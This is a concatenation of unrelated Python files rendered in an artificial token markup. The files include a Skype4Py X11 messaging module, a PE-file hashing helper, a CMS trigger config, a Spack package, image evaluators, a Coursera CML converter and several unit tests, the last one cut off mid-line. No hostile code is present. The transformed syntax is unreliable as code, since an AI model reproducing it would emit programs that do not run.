)<line_sep>x11.XOpenDisplay.restype=DisplayP<line_sep>x11.XPending.argtypes=(DisplayP )<line_sep>x11.XPending.restype=c_int<line_sep>x11.XSelectInput.argtypes=(DisplayP Window c_long)<line_sep>x11.XSelectInput.restype=<none><line_sep>x11.XSendEvent.argtypes=(DisplayP Window Bool c_long XEventP)<line_sep>x11.XSendEvent.restype=Status<line_sep>x11.XLockDisplay.argtypes=(DisplayP )<line_sep>x11.XLockDisplay.restype=<none><line_sep>x11.XUnlockDisplay.argtypes=(DisplayP )<line_sep>x11.XUnlockDisplay.restype=<none><def_stmt>threads_init gtk=<true><block_start>"""Enables multithreading support in Xlib and PyGTK. See the module docstring for more info. :Parameters: gtk : bool May be set to False to skip the PyGTK module. """<line_sep># enable X11 multithreading x11.XInitThreads()<if_stmt>gtk<block_start><import_from_stmt>gtk.gdk threads_init<line_sep>threads_init()<block_end><block_end><class_stmt>SkypeAPI(SkypeAPIBase)<block_start><def_stmt>__init__ self opts<block_start>self.logger=logging.getLogger('Skype4Py.api.posix_x11.SkypeAPI')<line_sep>SkypeAPIBase.__init__(self)<line_sep>finalize_opts(opts)<line_sep># initialize threads if not done already by the user threads_init(gtk=<false>)<line_sep># init Xlib display self.disp=x11.XOpenDisplay(<none>)<if_stmt><not>self.disp<block_start><raise>SkypeAPIError('Could not open XDisplay')<block_end>self.win_root=x11.XDefaultRootWindow(self.disp)<line_sep>self.win_self=x11.XCreateSimpleWindow(self.disp self.win_root 100 100 100 100 1 0 0)<line_sep>x11.XSelectInput(self.disp self.win_root PropertyChangeMask)<line_sep>self.win_skype=self.get_skype()<line_sep>ctrl='SKYPECONTROLAPI_MESSAGE'<line_sep>self.atom_msg=x11.XInternAtom(self.disp ctrl <false>)<line_sep>self.atom_msg_begin=x11.XInternAtom(self.disp ctrl+'_BEGIN' <false>)<line_sep>self.loop_event=threading.Event()<line_sep>self.loop_timeout=0.0001<line_sep>self.loop_break=<false><block_end><def_stmt>__del__ self<block_start><if_stmt>x11<block_start><if_stmt>hasattr(self 'disp')<block_start><if_stmt>hasattr(self 'win_self')<block_start>x11.XDestroyWindow(self.disp self.win_self)<block_end>x11.XCloseDisplay(self.disp)<block_end><block_end><block_end><def_stmt>run self<block_start>self.logger.info('thread started')<line_sep># main loop event=XEvent()<line_sep>data=''<while_stmt><not>self.loop_break<and>x11<block_start><while_stmt>x11.XPending(self.disp)<block_start>self.loop_timeout=0.0001<line_sep>x11.XNextEvent(self.disp byref(event))<line_sep># events we get here are already prefiltered by the predicate function <if_stmt>event.type<eq>ClientMessage<block_start><if_stmt>event.xclient.format<eq>8<block_start><if_stmt>event.xclient.message_type<eq>self.atom_msg_begin<block_start>data=str(event.xclient.data)<block_end><elif_stmt>event.xclient.message_type<eq>self.atom_msg<block_start><if_stmt>data<ne>''<block_start>data<augadd>str(event.xclient.data)<block_end><else_stmt><block_start>self.logger.warning('Middle of Skype X11 message received with no beginning!')<block_end><block_end><else_stmt><block_start><continue><block_end><if_stmt>len(event.xclient.data)<ne>20<and>data<block_start>self.notify(data.decode('utf-8'))<line_sep>data=''<block_end><block_end><block_end><elif_stmt>event.type<eq>PropertyNotify<block_start>namep=x11.XGetAtomName(self.disp event.xproperty.atom)<line_sep>is_inst=(c_char_p(namep).value<eq>'_SKYPE_INSTANCE')<line_sep>x11.XFree(namep)<if_stmt>is_inst<block_start><if_stmt>event.xproperty.state<eq>PropertyNewValue<block_start>self.win_skype=self.get_skype()<line_sep># changing attachment status can cause an event handler to be fired, in # turn it could try to call Attach() and doing this immediately seems to # confuse Skype (command '#0 NAME xxx' returns '#0 CONNSTATUS OFFLINE' :D); # to fix this, we give Skype some time to initialize itself time.sleep(1.0)<line_sep>self.set_attachment_status(apiAttachAvailable)<block_end><elif_stmt>event.xproperty.state<eq>PropertyDelete<block_start>self.win_skype=<none><line_sep>self.set_attachment_status(apiAttachNotAvailable)<block_end><block_end><block_end><block_end>self.loop_event.wait(self.loop_timeout)<if_stmt>self.loop_event.isSet()<block_start>self.loop_timeout=0.0001<block_end><elif_stmt>self.loop_timeout<l>1.0<block_start>self.loop_timeout<augmul>2<block_end>self.loop_event.clear()<block_end>self.logger.info('thread finished')<block_end><def_stmt>get_skype self<block_start>"""Returns Skype window ID or None if Skype not running."""<line_sep>skype_inst=x11.XInternAtom(self.disp '_SKYPE_INSTANCE' <true>)<if_stmt><not>skype_inst<block_start><return><block_end>type_ret=Atom()<line_sep>format_ret=c_int()<line_sep>nitems_ret=c_ulong()<line_sep>bytes_after_ret=c_ulong()<line_sep>winp=pointer(Window())<line_sep>fail=x11.XGetWindowProperty(self.disp self.win_root skype_inst 0 1 <false> 33 byref(type_ret) byref(format_ret) byref(nitems_ret) byref(bytes_after_ret) byref(winp))<if_stmt><not>fail<and>format_ret.value<eq>32<and>nitems_ret.value<eq>1<block_start><return>winp.contents.value<block_end><block_end><def_stmt>close self<block_start>self.loop_break=<true><line_sep>self.loop_event.set()<while_stmt>self.isAlive()<block_start>time.sleep(0.01)<block_end>SkypeAPIBase.close(self)<block_end><def_stmt>set_friendly_name self friendly_name<block_start>SkypeAPIBase.set_friendly_name(self friendly_name)<if_stmt>self.attachment_status<eq>apiAttachSuccess# reattach with the new name <block_start>self.set_attachment_status(apiAttachUnknown)<line_sep>self.attach()<block_end><block_end><def_stmt>attach self timeout wait=<true><block_start><if_stmt>self.attachment_status<eq>apiAttachSuccess<block_start><return><block_end>self.acquire()<try_stmt><block_start><if_stmt><not>self.isAlive()<block_start><try_stmt><block_start>self.start()<block_end><except_stmt>AssertionError<block_start><raise>SkypeAPIError('Skype API closed')<block_end><block_end><try_stmt><block_start>self.wait=<true><line_sep>t=threading.Timer(timeout2float(timeout) <lambda>:setattr(self 'wait' <false>))<if_stmt>wait<block_start>t.start()<block_end><while_stmt>self.wait<block_start>self.win_skype=self.get_skype()<if_stmt>self.win_skype<is><not><none><block_start><break><block_end><else_stmt><block_start>time.sleep(1.0)<block_end><block_end><else_stmt><block_start><raise>SkypeAPIError('Skype attach timeout')<block_end><block_end><finally_stmt><block_start>t.cancel()<block_end>command=Command('NAME %s'%self.friendly_name '' <true> timeout)<line_sep>self.release()<try_stmt><block_start>self.send_command(command <true>)<block_end><finally_stmt><block_start>self.acquire()<block_end><if_stmt>command.Reply<ne>'OK'<block_start>self.win_skype=<none><line_sep>self.set_attachment_status(apiAttachRefused)<line_sep><return><block_end>self.set_attachment_status(apiAttachSuccess)<block_end><finally_stmt><block_start>self.release()<block_end>command=Command('PROTOCOL %s'%self.protocol Blocking=<true>)<line_sep>self.send_command(command <true>)<line_sep>self.protocol=int(command.Reply.rsplit(<none> 1)[-1])<block_end><def_stmt>is_running self<block_start><return>(self.get_skype()<is><not><none>)<block_end><def_stmt>startup self minimized nosplash# options are not supported as of Skype 1.4 Beta for Linux <block_start><if_stmt><not>self.is_running()<block_start><if_stmt>os.fork()<eq>0# we're the child <block_start>os.setsid()<line_sep>os.execlp('skype' 'skype')<block_end><block_end><block_end><def_stmt>shutdown self<block_start><import_from_stmt>signal SIGINT<line_sep>fh=os.popen('ps -o %p --no-heading -C skype')<line_sep>pid=fh.readline().strip()<line_sep>fh.close()<if_stmt>pid<block_start>os.kill(int(pid) SIGINT)<line_sep># Skype sometimes doesn't delete the '_SKYPE_INSTANCE' property skype_inst=x11.XInternAtom(self.disp '_SKYPE_INSTANCE' <true>)<if_stmt>skype_inst<block_start>x11.XDeleteProperty(self.disp self.win_root skype_inst)<block_end>self.win_skype=<none><line_sep>self.set_attachment_status(apiAttachNotAvailable)<block_end><block_end><def_stmt>send_command self command force=<false><block_start><if_stmt>self.attachment_status<ne>apiAttachSuccess<and><not>force<block_start>self.attach(command.Timeout)<block_end>self.push_command(command)<line_sep>self.notifier.sending_command(command)<line_sep>cmd=u'#%d %s'%(command.Id command.Command)<line_sep>self.logger.debug('sending %s' repr(cmd))<if_stmt>command.Blocking<block_start>command._event=bevent=threading.Event()<block_end><else_stmt><block_start>command._timer=timer=threading.Timer(command.timeout2float() self.pop_command (command.Id ))<block_end>event=XEvent()<line_sep>event.xclient.type=ClientMessage<line_sep>event.xclient.display=self.disp<line_sep>event.xclient.window=self.win_self<line_sep>event.xclient.message_type=self.atom_msg_begin<line_sep>event.xclient.format=8<line_sep>cmd=cmd.encode('utf-8')+'\x00'<for_stmt>i xrange(0 len(cmd) 20)<block_start>event.xclient.data=cmd[i:i+20]<line_sep>x11.XSendEvent(self.disp self.win_skype <false> 0 byref(event))<line_sep>event.xclient.message_type=self.atom_msg<block_end>self.loop_event.set()<if_stmt>command.Blocking<block_start>bevent.wait(command.timeout2float())<if_stmt><not>bevent.isSet()<block_start><raise>SkypeAPIError('Skype command timeout')<block_end><block_end><else_stmt><block_start>timer.start()<block_end><block_end><def_stmt>notify self cmd<block_start>self.logger.debug('received %s' repr(cmd))<line_sep># Called by main loop for all received Skype commands. <if_stmt>cmd.startswith(u'#')<block_start>p=cmd.find(u' ')<line_sep>command=self.pop_command(int(cmd[1:p]))<if_stmt>command<is><not><none><block_start>command.Reply=cmd[p+1:]<if_stmt>command.Blocking<block_start>command._event.set()<block_end><else_stmt><block_start>command._timer.cancel()<block_end>self.notifier.reply_received(command)<block_end><else_stmt><block_start>self.notifier.notification_received(cmd[p+1:])<block_end><block_end><else_stmt><block_start>self.notifier.notification_received(cmd)<block_end><block_end><block_end>
# # Copyright (c) 2020 BlackBerry Limited. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Hash all portions of a PE file, this may be run as a separate process"""<line_sep># Standard imports <import_stmt>json<import_stmt>hashlib<import_stmt>pefile<def_stmt>hash_data data entropy_H<block_start>"""Calculate MD5/SHA1/SHA256 of given data Args: data (bytes): Data to calculate hashes/entropy entropy_H (pefile.SectionStructure.entropy_H): Callback function for calculating entropy Returns: dict: Dictionary of hashes/entropy """<line_sep>md5=hashlib.md5()<line_sep>sha1=hashlib.sha1()<line_sep>sha256=hashlib.sha256()<line_sep>md5.update(data)<line_sep>sha1.update(data)<line_sep>sha256.update(data)<line_sep><return>{"md5":md5.hexdigest() "sha1":sha1.hexdigest() "sha256":sha256.hexdigest() "entropy":entropy_H(data) "size":len(data)}<block_end><def_stmt>hash_pe_file filename data=<none> pe=<none> json_dumps=<true><block_start>"""Calculate PE file hashes. Either call directly or invoke via processpool:: processpool = multiprocessing.Pool(10) hashes = json.loads(processpool.apply_async(pe_tree.hash_pe.hash_pe_file, (filename,)).get()) Args: filename (str): Path to file to hash (or specify via data) data (bytes, optional): PE file data pe (pefile.PE, optional): Parsed PE file json_dumps (bool, optional): Return data as JSON Returns: dict: PE file hashes if json_dumps == False str: JSON PE file hashes if json_dumps == True """<if_stmt>pe<is><none><block_start>pe=pefile.PE(filename)<block_end># Calculate entropy (use pefile implementation!) entropy_H=pefile.SectionStructure(pe.__IMAGE_SECTION_HEADER_format__ pe=pe).entropy_H<line_sep>file_hashes={"file":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "file_no_overlay":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "dos_stub":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "sections":[] "resources":[] "security_directory":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0} "overlay":{"md5":"" "sha1":"" "sha256":"" "entropy":0.0 "size":0}}<if_stmt><not>data<block_start><with_stmt>open(filename "rb")<as>f<block_start>data=f.read()<block_end><block_end># Hash entire file file_hashes["file"]=hash_data(data entropy_H)<line_sep># Hash DOS stub <if_stmt>pe.DOS_HEADER.e_lfanew<g>64<block_start>file_hashes["dos_stub"]=hash_data(data[64:pe.DOS_HEADER.e_lfanew] entropy_H)<block_end># Hash sections <for_stmt>section pe.sections<block_start>file_hashes["sections"].append({"md5":section.get_hash_md5() "sha256":section.get_hash_sha256() "entropy":section.get_entropy()})<block_end># Hash resources <if_stmt>hasattr(pe "DIRECTORY_ENTRY_RESOURCE")<block_start>mapped_data=pe.get_memory_mapped_image()<for_stmt>resource_type pe.DIRECTORY_ENTRY_RESOURCE.entries<block_start><if_stmt><not>hasattr(resource_type "directory")<block_start><continue><block_end><for_stmt>resource_id resource_type.directory.entries<block_start><if_stmt><not>hasattr(resource_id "directory")<block_start><continue><block_end><for_stmt>resource_language resource_id.directory.entries<block_start><if_stmt><not>hasattr(resource_language "data")<block_start><continue><block_end>offset=resource_language.data.struct.OffsetToData<line_sep>size=resource_language.data.struct.Size<try_stmt><block_start>resource_data=mapped_data[offset:offset+size]<block_end><except_stmt><block_start>resource_data=""<block_end>file_hashes["resources"].append(hash_data(resource_data entropy_H))<block_end><block_end><block_end><block_end>overlay_offset=pe.get_overlay_data_start_offset()<if_stmt>overlay_offset<block_start>overlay_data=pe.get_overlay()<line_sep>security=pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_SECURITY"]]<if_stmt>security.VirtualAddress<ne>0<and>security.Size<ne>0<block_start>size=min(security.Size len(overlay_data))<line_sep># Hash security directory file_hashes["security_directory"]=hash_data(overlay_data[:size] entropy_H)<line_sep>overlay_data=overlay_data[size:]<line_sep>overlay_offset<augadd>size<block_end># Hash overlay file_hashes["overlay"]=hash_data(overlay_data entropy_H)<line_sep>file_hashes["file_no_overlay"]=hash_data(data[overlay_offset:] entropy_H)<block_end># Return JSON <if_stmt>json_dumps<block_start><return>json.dumps(file_hashes)<block_end># Return dict <return>file_hashes<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>DQMOffline.Trigger.photonMonitoring_cfi photonMonitoring<line_sep>hltPhotonmonitoring=photonMonitoring.clone()<line_sep>hltPhotonmonitoring.FolderName=cms.string('HLT/Photon/Photon200/')<line_sep>hltPhotonmonitoring.histoPSet.lsPSet=cms.PSet(nbins=cms.uint32(250) xmin=cms.double(0.) xmax=cms.double(2500.) )<line_sep>hltPhotonmonitoring.histoPSet.photonPSet=cms.PSet(nbins=cms.uint32(500) xmin=cms.double(0.0) xmax=cms.double(5000) )<line_sep>hltPhotonmonitoring.met=cms.InputTag("pfMetEI")# pfMet hltPhotonmonitoring.jets=cms.InputTag("pfJetsEI")# ak4PFJets, ak4PFJetsCHS hltPhotonmonitoring.electrons=cms.InputTag("gedGsfElectrons")# while pfIsolatedElectronsEI are reco::PFCandidate ! hltPhotonmonitoring.photons=cms.InputTag("gedPhotons")# while pfIsolatedElectronsEI are reco::PFCandidate ! hltPhotonmonitoring.numGenericTriggerEventPSet.andOr=cms.bool(<false>)<line_sep>#hltPhotonmonitoring.numGenericTriggerEventPSet.dbLabel = cms.string("ExoDQMTrigger") # it does not exist yet, we should consider the possibility of using the DB, but as it is now it will need a label per path ! hltPhotonmonitoring.numGenericTriggerEventPSet.andOrHlt=cms.bool(<true>)# True:=OR; False:=AND hltPhotonmonitoring.numGenericTriggerEventPSet.hltInputTag=cms.InputTag("TriggerResults::HLT")<line_sep>hltPhotonmonitoring.numGenericTriggerEventPSet.hltPaths=cms.vstring("HLT_Photon175_v*")# HLT_ZeroBias_v* #hltPhotonmonitoring.numGenericTriggerEventPSet.hltDBKey = cms.string("EXO_HLT_MET") hltPhotonmonitoring.numGenericTriggerEventPSet.errorReplyHlt=cms.bool(<false>)<line_sep>hltPhotonmonitoring.numGenericTriggerEventPSet.verbosityLevel=cms.uint32(1)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.andOr=cms.bool(<false>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.andOrHlt=cms.bool(<true>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.hltInputTag=cms.InputTag("TriggerResults::HLT")<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.hltPaths=cms.vstring("HLT_PFJet40_v*" "HLT_PFJet60_v*" "HLT_PFJet80_v*")# HLT_ZeroBias_v* hltPhotonmonitoring.denGenericTriggerEventPSet.errorReplyHlt=cms.bool(<false>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.dcsInputTag=cms.InputTag("scalersRawToDigi")<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.dcsPartitions=cms.vint32(24 25 26 27 28 29)# 24-27: strip, 28-29: pixel, we should add all other detectors ! hltPhotonmonitoring.denGenericTriggerEventPSet.andOrDcs=cms.bool(<false>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.errorReplyDcs=cms.bool(<true>)<line_sep>hltPhotonmonitoring.denGenericTriggerEventPSet.verbosityLevel=cms.uint32(1)<line_sep>
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) <class_stmt>RubyErubis(RubyPackage)<block_start>"""Erubis is a fast, secure, and very extensible implementation of eRuby. """<line_sep>homepage="http://www.kuwata-lab.com/erubis/"<line_sep>git="https://github.com/kwatch/erubis.git"<line_sep>version('master' branch='master')<line_sep>version('2.7.0' commit='<PASSWORD>')<def_stmt>patch self<block_start>filter_file('$Release$' str(self.version) 'erubis.gemspec' string=<true>)<block_end><block_end>
<import_stmt>os<import_stmt>cv2<line_sep>cv2.setNumThreads(0)<line_sep>cv2.ocl.setUseOpenCL(<false>)<import_stmt>numpy<as>np<import_from_stmt>.eval Evaluator<class_stmt>FullImageEvaluator(Evaluator)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end><def_stmt>process_batch self predicted model data prefix=""<block_start>names=data['image_name']<for_stmt>i range(len(names))<block_start>self.on_image_constructed(names[i] predicted[i <ellipsis>] prefix)<block_end><block_end><def_stmt>save self name prediction prefix=""<block_start>cv2.imwrite(os.path.join(self.save_dir prefix+name) (prediction<times>255).astype(np.uint8))<block_end><block_end><class_stmt>CropEvaluator(Evaluator)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<line_sep>self.current_mask=<none><line_sep>self.current_prediction=<none><line_sep>self.current_image_name=<none><block_end><def_stmt>process_batch self predicted model data prefix=""<block_start>names=data['image_name']<line_sep>config=self.config<line_sep>batch_geometry=self.parse_geometry(data['geometry'])<for_stmt>i range(len(names))<block_start>name=names[i]<line_sep>geometry=batch_geometry[i]<line_sep>sx,sy=geometry['sx'] geometry['sy']<line_sep>pred=self.cut_border(np.squeeze(predicted[i <ellipsis>]))<if_stmt>name<ne>self.current_image_name<block_start><if_stmt>self.current_image_name<is><none><block_start>self.current_image_name=name<block_end><else_stmt><block_start>self.on_image_constructed(self.current_image_name self.current_prediction/self.current_mask prefix=prefix)<block_end>self.construct_big_image(geometry)<block_end>self.current_prediction[sy+self.border:sy+config.target_rows-self.border sx+self.border:sx+config.target_cols-self.border]<augadd>pred<line_sep>self.current_mask[sy+self.border:sy+config.target_rows-self.border sx+self.border:sx+config.target_cols-self.border]<augadd>1<line_sep>self.current_image_name=name<block_end><block_end><def_stmt>parse_geometry self batch_geometry<block_start>rows=batch_geometry['rows'].numpy()<line_sep>cols=batch_geometry['cols'].numpy()<line_sep>sx=batch_geometry['sx'].numpy()<line_sep>sy=batch_geometry['sy'].numpy()<line_sep>geometries=[]<for_stmt>idx range(rows.shape[0])<block_start>geometry={'rows':rows[idx] 'cols':cols[idx] 'sx':sx[idx] 'sy':sy[idx]}<line_sep>geometries.append(geometry)<block_end><return>geometries<block_end><def_stmt>construct_big_image self geometry<block_start>self.current_mask=np.zeros((geometry['rows'] geometry['cols']) np.uint8)<line_sep>self.current_prediction=np.zeros((geometry['rows'] geometry['cols']) np.float32)<block_end><def_stmt>save self name prediction prefix=""<block_start>cv2.imwrite(os.path.join(self.save_dir prefix+name) (prediction<times>255).astype(np.uint8))<block_end><def_stmt>post_predict_action self prefix<block_start>self.on_image_constructed(self.current_image_name self.current_prediction/self.current_mask prefix=prefix)<line_sep>self.current_image_name=<none><block_end><block_end>
<import_stmt>logging<import_stmt>copy<import_stmt>re<import_from_stmt>urllib.parse quote<import_stmt>bs4<import_stmt>jinja2<import_from_stmt>.resource load_resource<import_from_stmt>.define URL_ROOT<def_stmt>_is_root e<block_start><return>e.parent<is><none><block_end><def_stmt>_is_tag e<block_start><return>isinstance(e bs4.Tag)<block_end><def_stmt>_has_no_child tag<block_start><return>len(tag.contents)<eq>0<block_end><class_stmt>Traversal<block_start>'''depth-first traversal '''<def_stmt>__init__ self root * tagOnly=<false><block_start><assert_stmt>_is_root(root)<line_sep>self._e=root<line_sep>self._skip_children=<false><line_sep>self._tagOnly=tagOnly<block_end><def_stmt>__iter__ self<block_start><return>self<block_end><def_stmt>__next__ self<block_start>e=self._next()<if_stmt>e<is><none><block_start><raise>StopIteration('no more element')<block_end>self._e=e<line_sep>self._skip_children=<false><line_sep><return>e<block_end><def_stmt>_next self<block_start><if_stmt>(<not>self._skip_children)<and>_is_tag(self._e)<block_start><for_stmt>e self._e.children<block_start><if_stmt>(<not>self._tagOnly)<or>_is_tag(e)<block_start><return>e<block_end><block_end><block_end>e=self._e<while_stmt><true><block_start><if_stmt>_is_root(e)<block_start><return><none><block_end><for_stmt>_e e.next_siblings<block_start><if_stmt>(<not>self._tagOnly)<or>_is_tag(_e)<block_start><return>_e<block_end><block_end>e=e.parent<block_end><block_end><def_stmt>skip_children self<block_start>self._skip_children=<true><block_end><block_end><class_stmt>CML<block_start><def_stmt>__init__ self doc<block_start>doc=doc.translate(doc.maketrans('\u21b5' ' '))<line_sep>self._root=bs4.BeautifulSoup(doc 'lxml-xml')<line_sep>self._assets=<none><line_sep>self._assetIDs=<none><line_sep>self._refids=<none><line_sep>self._html=<none><block_end><def_stmt>get_resources self * _pat_ref=re.compile(r'%s/learn/[^/]+/resources/([0-9a-zA-Z-]+)'%URL_ROOT)<block_start><if_stmt>self._assets<is><none><block_start>self._assets=[]<line_sep>self._assetIDs=[]<line_sep>self._refids=[]<for_stmt>e Traversal(self._root tagOnly=<true>)<block_start><if_stmt>e.name<eq>'asset'<block_start>self._assetIDs.append(e['id'])<block_end><elif_stmt>e.name<eq>'img'<block_start><if_stmt>e.get('src')<block_start><import_stmt>uuid<import_from_stmt>.lib.misc url_basename<import_from_stmt>.define Asset<line_sep>id_=str(uuid.uuid4())<line_sep>e['assetId']=id_<line_sep>url=e['src']<line_sep>name=url_basename(url)<line_sep>self._assets.append(Asset(id_=id_ url=url name=name))<block_end><else_stmt><block_start>self._assetIDs.append(e['assetId'])<block_end><block_end><elif_stmt>e.name<eq>'a'<block_start>match=_pat_ref.match(e['href'])<if_stmt>match<block_start>_=match.group(1)<line_sep>self._refids.append(_)<line_sep>e['refid']=_<block_end><block_end><block_end><block_end><return>self._assets self._assetIDs self._refids<block_end><def_stmt>to_html self * assets<block_start><if_stmt>self._html<is><not><none><block_start><return>self._html<block_end>asset_by_id={_['id']:_<for>_ assets}<def_stmt>_assetName id_<block_start><return>asset_by_id[id_]['name']<block_end>html=bs4.BeautifulSoup('' 'lxml')<line_sep>d={}<def_stmt>_add e0 e1<block_start>parent1=html<line_sep>_e=e0<while_stmt>_e<is><not><none><block_start><if_stmt>id(_e)<in>d<block_start>parent1=d[id(_e)]<line_sep><break><block_end>_e=_e.parent<block_end><if_stmt>(parent1<is>html)<and>(<not>_is_tag(e0))<block_start><return><block_end><if_stmt>_is_tag(e0)<block_start>d[id(e0)]=e1<block_end>parent1.append(e1)<block_end>tr=Traversal(self._root)<for_stmt>e0 tr<block_start><if_stmt>isinstance(e0 bs4.NavigableString)<block_start>_li=str(e0).split('$$')<line_sep>hasMath=<false><for_stmt>_ _li<block_start><if_stmt><not>hasMath<block_start>_add(e0 _)<block_end><else_stmt><block_start>_span=bs4.Tag(name='span')<line_sep>_span['hasMath']='true'<line_sep>_span.append(_)<line_sep>_add(e0 _span)<block_end>hasMath=<not>hasMath<block_end><continue><block_end><if_stmt><not>_is_tag(e0)<block_start><continue><block_end><if_stmt>e0.name<eq>'asset'<block_start><assert_stmt>_has_no_child(e0)<line_sep>e1=bs4.Tag(name='p')<line_sep>e1['class']='asset'<line_sep>e1.append(_assetName(e0['id']))<block_end><elif_stmt>e0.name<eq>'img'<block_start><assert_stmt>_has_no_child(e0)<line_sep>e1=bs4.Tag(name='img')<line_sep>e1['src']=e1['alt']=_assetName(e0['assetId'])<line_sep>e1['src']=quote(e1['src'])<block_end><elif_stmt>e0.name<eq>'heading'<block_start>e1=bs4.Tag(name='h%d'%int(e0['level']))<block_end><elif_stmt>e0.name<eq>'text'<block_start>e1=bs4.Tag(name='p')<block_end><elif_stmt>e0.name<eq>'list'<block_start>bulletType=e0['bulletType']<if_stmt>bulletType<eq>'numbers'<block_start>e1=bs4.Tag(name='ol')<line_sep>e1['type']='1'<block_end><elif_stmt>bulletType<eq>'bullets'<block_start>e1=bs4.Tag(name='ul')<block_end><else_stmt><block_start>e1=bs4.Tag(name='ul')<line_sep>logging.warning('[CML] unknown bulletType=%s'%bulletType)<block_end><block_end><elif_stmt>e0.name<eq>'a'<block_start>e1=bs4.Tag(name='a')<line_sep>e1['href']=e0['href']<if_stmt>e0.get('refid')<block_start>e1['refid']=e0['refid']<block_end><block_end><elif_stmt>e0.name<eq>'code'<block_start>e1=bs4.Tag(name='pre')<line_sep>e1.append(copy.copy(e0))<line_sep>tr.skip_children()<block_end><elif_stmt>e0.name<in>['li' 'strong' 'em' 'u' 'table' 'tr' 'td' 'th' 'sup' 'sub']<block_start>e1=bs4.Tag(name=e0.name)<block_end><elif_stmt>e0.name<in>['co-content']<block_start><continue><block_end><else_stmt><block_start>logging.warning('[CML] unknown e0.name=%s\n%s'%(e0.name e0))<line_sep><continue><block_end>_add(e0 e1)<block_end>self._html=str(html)<line_sep><return>self._html<block_end><block_end><def_stmt>render_supplement * content resource_path title='' __={}<block_start><if_stmt>__.get('template')<is><none><block_start>__['template']=jinja2.Template(load_resource('template/supplement.html').decode('UTF-8'))<block_end><return>__['template'].render(content=content resource_path=resource_path title=title)<block_end>
<import_stmt>numpy<as>np<import_from_stmt>small_text.active_learner PoolBasedActiveLearner<def_stmt>get_initialized_active_learner clf_factory query_strategy dataset<block_start>active_learner=PoolBasedActiveLearner(clf_factory query_strategy dataset)<line_sep>x_indices_initial=np.random.choice(np.arange(len(dataset)) size=10 replace=<false>)<line_sep>y_initial=np.array([0 1 0 1 0 1 0 1 0 1])<line_sep>active_learner.initialize_data(x_indices_initial y_initial)<line_sep><return>active_learner<block_end>
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ <import_stmt>numpy<as>np<import_stmt>mindspore.context<as>context<import_stmt>mindspore.nn<as>nn<import_from_stmt>mindspore Tensor<import_from_stmt>mindspore.ops operations<as>P<line_sep>context.set_context(mode=context.GRAPH_MODE device_target="Ascend")<class_stmt>Net(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Net self).__init__()<line_sep>self.mask=P.DropoutGenMask(10 28)<line_sep>self.shape=P.Shape()<block_end><def_stmt>construct self x_ y_<block_start>shape_x=self.shape(x_)<line_sep><return>self.mask(shape_x y_)<block_end><block_end>x=np.ones([2 4 2 2]).astype(np.int32)<line_sep>y=np.array([1.0]).astype(np.float32)<def_stmt>test_net <block_start>mask=Net()<line_sep>tx,ty=Tensor(x) Tensor(y)<line_sep>output=mask(tx ty)<line_sep>print(output.asnumpy())<assert_stmt>([255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255]<eq>output.asnumpy()).all()<block_end>
# Copyright (c) Microsoft Corporation. # Licensed under the MIT License <import_stmt>unittest<import_from_stmt>datetime timedelta<import_from_stmt>azure.kusto.data._converters to_datetime to_timedelta<class_stmt>ConverterTests(unittest.TestCase)<block_start>"""These are unit tests that should test custom converters used in."""<def_stmt>test_to_timestamp self<block_start>"""Happy path to test converter from TimeSpan to timedelta."""<line_sep># Test hours, minutes and seconds <assert_stmt>to_timedelta("00:00:00")<eq>timedelta(seconds=0)<assert_stmt>to_timedelta("00:00:03")<eq>timedelta(seconds=3)<assert_stmt>to_timedelta("00:04:03")<eq>timedelta(minutes=4 seconds=3)<assert_stmt>to_timedelta("02:04:03")<eq>timedelta(hours=2 minutes=4 seconds=3)<line_sep># Test milliseconds <assert_stmt>to_timedelta("00:00:00.099")<eq>timedelta(milliseconds=99)<assert_stmt>to_timedelta("02:04:03.0123")<eq>timedelta(hours=2 minutes=4 seconds=3 microseconds=12300)<line_sep># Test days <assert_stmt>to_timedelta("01.00:00:00")<eq>timedelta(days=1)<assert_stmt>to_timedelta("02.04:05:07")<eq>timedelta(days=2 hours=4 minutes=5 seconds=7)<line_sep># Test negative <assert_stmt>to_timedelta("-01.00:00:00")<eq>-timedelta(days=1)<assert_stmt>to_timedelta("-02.04:05:07")<eq>-timedelta(days=2 hours=4 minutes=5 seconds=7)<line_sep># Test all together <assert_stmt>to_timedelta("00.00:00:00.000")<eq>timedelta(seconds=0)<assert_stmt>to_timedelta("02.04:05:07.789")<eq>timedelta(days=2 hours=4 minutes=5 seconds=7 milliseconds=789)<assert_stmt>to_timedelta("03.00:00:00.111")<eq>timedelta(days=3 